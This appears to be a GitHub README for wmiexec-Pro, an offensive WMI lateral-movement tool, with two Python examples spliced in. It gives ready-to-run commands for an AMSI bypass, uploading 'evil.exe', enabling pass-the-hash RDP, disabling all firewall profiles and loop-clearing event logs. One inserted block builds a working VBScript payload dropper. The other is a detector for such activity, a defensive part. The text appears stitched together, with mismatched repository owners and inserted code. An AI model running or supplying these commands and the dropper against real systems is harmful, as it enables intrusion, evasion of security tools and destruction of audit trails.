svchost9913/wmiexec-Pro
wmiexec-Pro

New generation of wmiexec.py.

Table of Contents

  1. Info
  2. Features
  3. Getting Started
  4. Usage
  5. Screenshots
  6. How it works?
  7. References

Info

The new generation of wmiexec.py, with more features. Every operation goes through WMI over DCOM on port 135 and needs no SMB connection, which helps evade AV products (Windows Defender, HuoRong, 360) during lateral movement. Note that DCOM only starts on port 135: the RPC endpoint mapper then hands the client a dynamic high port for the WMI interface, so "only port 135" means "no port 445/SMB", not a single TCP port, and the target firewall must still allow the dynamic RPC range.


Features

  • Main feature: only needs port 135 (no SMB).
  • New module: AMSI bypass
  • New module: file transfer
  • New module: remotely enable RDP via a WMI class method
  • New module: Windows Firewall abuse
  • New module: event log loop cleaning
  • New module: remotely enable WinRM without touching CMD
  • Enhancement: command execution output is retrieved in a new way
  • Enhancement: execute VBS files


Getting Started

Installation

Only the latest version of Impacket is needed.

  1. Clone the Impacket repository
    git clone https://github.com/fortra/impacket
  2. Install Impacket
    cd impacket && sudo pip3 install .
  3. Enjoy it :)
    git clone https://github.com/XiaoliChan/wmiexec-Pro


Usage

python3 wmiexec-pro.py [[domain/]username[:password]@]<targetName or address> module -h

Enable/disable amsi bypass:
   python3 wmiexec-pro.py administrator:[email protected] amsi -enable
   python3 wmiexec-pro.py administrator:[email protected] amsi -disable

Execute command:
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" (silent, no output)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -with-output (with output)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -with-output -save (with output and save output to file)
   
Filetransfer:
   python3 wmiexec-pro.py administrator:[email protected] filetransfer -upload -src-file "./evil.exe" -dest-file "C:\windows\temp\evil.exe" (upload, files larger than 512 KB supported)
   python3 wmiexec-pro.py administrator:[email protected] filetransfer -download -src-file "C:\windows\temp\evil.exe" -dest-file "/tmp/evil.exe" (download, files larger than 512 KB supported)
   
RDP:
   python3 wmiexec-pro.py administrator:[email protected] rdp -enable (Auto configure firewall)
   python3 wmiexec-pro.py administrator:[email protected] rdp -enable-ram (enable Restricted Admin Mode for PTH)
   python3 wmiexec-pro.py administrator:[email protected] rdp -disable
   python3 wmiexec-pro.py administrator:[email protected] rdp -disable-ram (Disable Restricted Admin Mode)

WinRM:
   python3 wmiexec-pro.py administrator:[email protected] winrm -enable
   python3 wmiexec-pro.py administrator:[email protected] winrm -disable

Firewall:
   python3 wmiexec-pro.py administrator:[email protected] firewall -search-port 445
   python3 wmiexec-pro.py administrator:[email protected] firewall -dump (Dump all firewall rules)
   python3 wmiexec-pro.py administrator:[email protected] firewall -rule-id (ID from search port) -rule-op [enable/disable/remove] (enable, disable, remove specify rule)
   python3 wmiexec-pro.py administrator:[email protected] firewall -firewall-profile enable (Enable all firewall profiles)
   python3 wmiexec-pro.py administrator:[email protected] firewall -firewall-profile disable (disable all firewall profiles)
   
Eventlog:
   python3 wmiexec-pro.py administrator:[email protected] eventlog -risk-i-know (start loop-cleaning the event log)
   python3 wmiexec-pro.py administrator:[email protected] eventlog -retrive object-ID (stop loop-cleaning the event log)
   


Screenshots

(Images not reproduced here.)

  • Help
  • exec-command
  • filetransfer
    • upload file
    • download file

How it works?

  • AMSI module:

    • Tal Liberman's technique from Black Hat Asia 2018.
  • exec-command module:

    • Enhancement of the previous project wmiexec-RegOut: output is read back from a WMI class instead of from the registry.
  • filetransfer module:

    • Upload: the source file is base64-encoded into the dropper WriteFile.vbs, then a new ActiveScriptEventConsumer instance is created to execute the dropper.
    • Download: a class is created remotely to store data, then the encoder LocalFileIntoClass.vbs is executed to encode the file and store the data in the class that was just created.
  • rdp module:

    • Enable/disable RDP services: the TerminalServices object is controlled directly.
    • Enable/disable Restricted Admin Mode: the registry value DisableRestrictedAdmin is set via the StdRegProv class.
  • winrm module:

    • Enable/disable: the StartService()/StopService() methods of Win32_Service are called.
    • Firewall rules: the firewall.py module configures the firewall for WinRM.
  • firewall module:

    • Abuses the MSFT_NetProtocolPortFilter, MSFT_NetFirewallRule and MSFT_NetFirewallProfile classes.
  • eventlog module:

    • Executes the VBS script ClearEventlog.vbs without removing the event filter and consumer.
  • execute-vbs module:

    • Taken from wmipersist.py.
  • classMethodEx method:

    • Create class: executes the VBS script CreateClass.vbs to create a simple class (why? no idea how to use the PutClass method in Impacket).
    • Remove class: calls the DeleteClass method to remove the class.
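The upload/download data flow described for the filetransfer module, as an added example in plain Python. This is not wmiexec-Pro's own code and the page does not show WriteFile.vbs or LocalFileIntoClass.vbs; the function names, the MSXML2.DOMDocument/ADODB.Stream decoding in the generated script, and the indexed Index/Data chunk layout for class-stored data are this example's assumptions. It runs offline and round-trips a constructed payload through both directions.

```python
import base64
import re

# Chunk size for the base64 text: keeps each VBScript string literal short and,
# on the download side, models splitting a large file across several stored
# chunks (assumed layout; the page only says the data goes into a created class).
CHUNK = 8192

_DROPPER_LINE = re.compile(r'^b64 = b64 & "([A-Za-z0-9+/=]*)"$')


def build_writefile_vbs(payload: bytes, dest_path: str) -> str:
    """Upload side: return a VBScript dropper that writes `payload` to `dest_path`.

    The script accumulates the base64 text, decodes it with MSXML2.DOMDocument
    (dataType bin.base64) and writes the bytes with ADODB.Stream. Both are stock
    COM objects, so nothing has to be staged on the target beforehand.
    """
    b64 = base64.b64encode(payload).decode("ascii")
    chunks = [b64[i:i + CHUNK] for i in range(0, len(b64), CHUNK)]
    dest = dest_path.replace('"', '""')  # VBScript escapes a quote by doubling it
    lines = ['b64 = ""']
    lines += [f'b64 = b64 & "{c}"' for c in chunks]
    lines += [
        'Set xml = CreateObject("MSXML2.DOMDocument")',
        'Set node = xml.createElement("b64")',
        'node.dataType = "bin.base64"',
        'node.text = b64',
        'Set stm = CreateObject("ADODB.Stream")',
        'stm.Type = 1',                  # adTypeBinary
        'stm.Open',
        'stm.Write node.nodeTypedValue',  # decoded bytes
        f'stm.SaveToFile "{dest}", 2',   # adSaveCreateOverWrite
        'stm.Close',
    ]
    return "\r\n".join(lines) + "\r\n"


def extract_payload(vbs: str) -> bytes:
    """Recover the embedded file from a dropper built by build_writefile_vbs
    (handy when such a script turns up in WMI consumer logs or on disk)."""
    parts = []
    for line in vbs.splitlines():
        m = _DROPPER_LINE.match(line)
        if m:
            parts.append(m.group(1))
    return base64.b64decode("".join(parts), validate=True)


def encode_for_class(payload: bytes) -> list:
    """Download side, what a LocalFileIntoClass-style encoder would produce
    under the assumed layout: base64 split into indexed chunks, one per record."""
    b64 = base64.b64encode(payload).decode("ascii")
    return [{"Index": n, "Data": b64[i:i + CHUNK]}
            for n, i in enumerate(range(0, len(b64), CHUNK))]


def decode_class_chunks(records: list) -> bytes:
    """Operator side: reassemble chunks read back from the remote class.
    Records may arrive in any order; a gap or duplicate index means the
    transfer is incomplete, so fail loudly instead of writing a corrupt file."""
    ordered = sorted(records, key=lambda r: r["Index"])
    if [r["Index"] for r in ordered] != list(range(len(ordered))):
        raise ValueError("missing or duplicate chunk index")
    return base64.b64decode("".join(r["Data"] for r in ordered), validate=True)


if __name__ == "__main__":
    sample = bytes(range(256)) * 100  # constructed 25,600-byte payload
    script = build_writefile_vbs(sample, r"C:\Windows\Temp\payload.bin")
    assert extract_payload(script) == sample
    assert decode_class_chunks(list(reversed(encode_for_class(sample)))) == sample
    print(f"dropper: {len(script)} chars, round-trip ok")
```

Run it with python3 to see the round-trip; pointing extract_payload at a recovered script pulls the transferred file back out for analysis.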
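The ActiveScriptEventConsumer execution primitive used by the filetransfer, eventlog and execute-vbs modules above is also the part a defender can see. As an added example that is not part of wmiexec-Pro, the following Python flags the creation of a script consumer whose body looks like a dropper or log cleaner and ties it to its filter through the binding event. The records are constructed in the shape of Sysmon event IDs 19 (WmiFilter), 20 (WmiConsumer) and 21 (WmiBinding); the field names follow that schema, but the values, the SUSPICIOUS string list and the helper names are this example's own assumptions.

```python
import re

# Strings a VBScript dropper or log cleaner of the kind described above tends to
# contain (base64 decode via MSXML, binary write via ADODB.Stream, event log
# clearing). A starting list to tune, not a signature database.
SUSPICIOUS = re.compile(
    r"ADODB\.Stream|bin\.base64|MSXML2\.DOMDocument|ClearEventLog|"
    r"Win32_NTEventlogFile|WScript\.Shell",
    re.IGNORECASE,
)

_NAME_IN_PATH = re.compile(r'Name="([^"]+)"')


def _instance_name(path: str) -> str:
    r"""'\\.\root\subscription:__EventFilter.Name="WF1"' -> 'WF1'."""
    m = _NAME_IN_PATH.search(path or "")
    return m.group(1) if m else (path or "").strip('"')


def analyze_wmi_events(events: list) -> list:
    """Flag 'Script' consumers (ActiveScriptEventConsumer) whose body matches
    SUSPICIOUS and attach the filter(s) they are bound to, so the alert also
    says when the script will fire."""
    consumers, filters, bindings = {}, {}, []
    for ev in events:
        if ev.get("Operation") != "Created":
            continue
        eid = ev.get("EventID")
        if eid == 20:
            consumers[ev["Name"].strip('"')] = ev
        elif eid == 19:
            filters[ev["Name"].strip('"')] = ev
        elif eid == 21:
            bindings.append(ev)

    alerts = []
    for name, c in consumers.items():
        if c.get("Type") != "Script":
            continue
        m = SUSPICIOUS.search(c.get("Destination", ""))
        if not m:
            continue
        bound_filters = [_instance_name(b.get("Filter"))
                         for b in bindings
                         if _instance_name(b.get("Consumer")) == name]
        alerts.append({
            "consumer": name,
            "user": c.get("User"),
            "indicator": m.group(0),
            "bound": bool(bound_filters),
            "filters": [{"name": f, "query": filters.get(f, {}).get("Query")}
                        for f in bound_filters],
        })
    return alerts


# Constructed sample records in the shape of Sysmon event IDs 19/20/21; the
# values (users, names, script text) are made up for this example.
SAMPLE_EVENTS = [
    {"EventID": 20, "Operation": "Created", "User": "CORP\\svc-backup",
     "Name": '"BackupNotify"', "Type": "Command Line",
     "Destination": '"C:\\Tools\\notify.exe"'},
    {"EventID": 19, "Operation": "Created", "User": "CORP\\administrator",
     "Name": '"WF1"', "EventNamespace": '"root\\cimv2"',
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 5 "
              "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"},
    {"EventID": 20, "Operation": "Created", "User": "CORP\\administrator",
     "Name": '"WC1"', "Type": "Script",
     "Destination": 'Set stm = CreateObject("ADODB.Stream"): stm.Type = 1: '
                    'stm.Open: stm.Write node.nodeTypedValue: '
                    'stm.SaveToFile "C:\\Windows\\Temp\\evil.exe", 2'},
    {"EventID": 21, "Operation": "Created", "User": "CORP\\administrator",
     "Consumer": '\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name="WC1"',
     "Filter": '\\\\.\\root\\subscription:__EventFilter.Name="WF1"'},
]


if __name__ == "__main__":
    for alert in analyze_wmi_events(SAMPLE_EVENTS):
        print(alert)
```

The benign CommandLineEventConsumer in the sample is ignored; the script consumer is reported together with the __EventFilter it is bound to, which is what an analyst needs to judge whether the dropper fires once or keeps running (the eventlog module's loop cleaning relies on exactly that).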


References

